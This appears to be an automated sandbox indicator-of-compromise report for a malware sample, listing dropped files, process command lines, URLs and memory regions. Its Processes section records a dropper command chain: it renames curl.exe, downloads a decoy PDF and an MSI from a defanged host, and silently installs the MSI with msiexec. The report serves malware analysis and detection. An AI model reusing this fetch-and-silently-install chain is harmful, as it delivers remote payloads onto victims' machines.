IOC Report

loading gif

Files

File Path
Type
Category
Malicious
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cd /d "C:\"
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V

URLs

Name
IP
Malicious
https://curl.se/docs/hsts.html
unknown
https://curl.se/docs/copyright.htmlD
unknown
https://curl.se/libcurl/c/curl_easy_setopt.html
unknown
https://curl.se/P
unknown
https://curl.se/docs/http-cookies.html#
unknown
https://curl.se/docs/http-cookies.html
unknown
https://curl.se/docs/hsts.html#
unknown
https://curl.se/docs/sslcerts.html
unknown
https://curl.se/docs/sslcerts.htmlcurl
unknown

Domains

Name
IP
Malicious
241.42.69.40.in-addr.arpa
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
E00000
unkown
page readonly
333D000
stack
page read and write
34B0000
heap
page read and write
E55000
unkown
page readonly
381F000
stack
page read and write
33A0000
heap
page read and write
34CA000
heap
page read and write
3460000
heap
page read and write
34C0000
heap
page read and write
E6F000
unkown
page read and write
E00000
unkown
page readonly
36EF000
stack
page read and write
382F000
stack
page read and write
346A000
heap
page read and write
E55000
unkown
page readonly
371E000
stack
page read and write
E01000
unkown
page execute read
33F0000
heap
page read and write
E00000
unkown
page readonly
3450000
heap
page read and write
E55000
unkown
page readonly
3910000
heap
page read and write
323D000
stack
page read and write
34CA000
heap
page read and write
E70000
unkown
page readonly
E00000
unkown
page readonly
3415000
heap
page read and write
E70000
unkown
page readonly
3390000
heap
page read and write
2FFD000
stack
page read and write
3360000
heap
page read and write
34C3000
heap
page read and write
3463000
heap
page read and write
E01000
unkown
page execute read
E01000
unkown
page execute read
3458000
heap
page read and write
34B8000
heap
page read and write
3420000
heap
page read and write
372E000
stack
page read and write
346A000
heap
page read and write
32FD000
stack
page read and write
33C5000
heap
page read and write
E01000
unkown
page execute read
3410000
heap
page read and write
33C0000
heap
page read and write
35EE000
stack
page read and write
E55000
unkown
page readonly
33AE000
stack
page read and write
3970000
heap
page read and write
33EE000
stack
page read and write
E70000
unkown
page readonly
E70000
unkown
page readonly
3380000
heap
page read and write
E6F000
unkown
page read and write
There are 44 hidden memdumps, click here to show them.